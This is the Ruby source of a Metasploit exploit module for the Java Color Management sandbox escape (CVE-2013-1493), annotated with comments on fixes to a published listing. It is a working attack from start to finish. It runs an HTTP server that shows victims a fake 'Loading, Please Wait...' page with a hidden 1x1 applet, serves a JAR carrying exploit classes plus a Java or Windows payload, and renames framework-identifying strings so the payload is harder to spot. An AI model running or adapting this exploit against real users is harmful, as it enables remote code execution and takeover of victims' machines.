##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
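# Framework core and the Rex support library (HTTP server, JAR builder,
# rand_text_* helpers). Plain ASCII quotes: the typographic ones that crept
# into this listing are a parse error in Ruby.
require 'msf/core'
require 'rex'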
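# Java CMM (CVE-2013-1493) applet exploit.
#
# Serves an HTML page embedding a 1x1 applet whose entry class is one of the
# precompiled helper classes shipped in data/exploits/cve-2013-1493/, then
# serves the JAR itself (helper classes + the payload classes) on any *.jar
# request. Class and entry names that identify the framework are rewritten
# with random, same-length strings before the JAR is sent.
#
# Fixes against the listing as published: the stranded `'DefaultTarget' => 1`
# hash entry is moved back into the module info (it was sitting inside
# on_request_uri, a syntax error), the doubled quote on DisclosureDate and
# the typographic quotes are replaced by plain ones, and the repeated
# class-file reads go through one helper.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The applet tag needs no JavaScript on the victim side, so BrowserAutopwn
  # may serve this module to script-less browsers too.
  autopwn_info({ :javascript => false })

  # Registers module metadata: references, payload constraints and the two
  # targets (pure-Java payload, or a native Windows x86 payload). Target 1,
  # the native Windows payload, is the default.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      # The payload travels inside the JAR, so NOP padding does not apply;
      # 'Space' caps the encoded payload embedded there.
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled classes from the framework data directory and
  # randomizes the name of the applet entry class (the other three keep
  # their names, and the JAR references them under those names).
  #
  # The new name is generated with exactly the same length as "Init" on
  # purpose: the rename is a raw byte substitution on the compiled class
  # file, and keeping the length constant avoids corrupting length-prefixed
  # strings inside it. Note that gsub! rewrites every occurrence of "Init"
  # in the file, not only the class name.
  def setup
    @init_class           = read_exploit_class('Init.class')
    @leak_class           = read_exploit_class('Leak.class')
    @buffered_image_class = read_exploit_class('MyBufferedImage.class')
    @color_space_class    = read_exploit_class('MyColorSpace.class')

    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)
    super
  end

  # HTTP dispatcher for the exploit's resource.
  #
  # - any URI ending in .jar (case-insensitive): build and send the JAR.
  #   The archive name embedded in the HTML is random, so no specific
  #   filename is required here.
  # - the resource root (URI ending in "/"): regenerate the payload for this
  #   client and send the applet page; 404 if generation fails.
  # - anything else: redirect to the resource root.
  #
  # @param cli [Rex::Socket] client connection
  # @param request [Rex::Proto::Http::Request] parsed request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)
      randomize_jar_names(jar)
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a 1x1 applet pointing at a randomly named JAR
  # and at the randomized entry class chosen in setup.
  #
  # @return [String] the HTML document
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

  private

  # Reads one compiled helper class from data/exploits/cve-2013-1493/ as raw
  # bytes (the class files are patched byte-wise later, so no transcoding).
  #
  # @param name [String] file name of the class inside the exploit data dir
  # @return [String] binary contents of the file
  def read_exploit_class(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Rewrites the "metasploit" / "Payload" markers in every entry name and in
  # the entry bytes of the payload JAR with random strings of identical
  # length. As in setup, the same-length requirement is what keeps the
  # byte-level substitution safe on compiled class files.
  #
  # @param jar [Rex::Zip::Jar] archive to mutate in place
  def randomize_jar_names(jar)
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)
    jar.entries.each { |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    }
  end
end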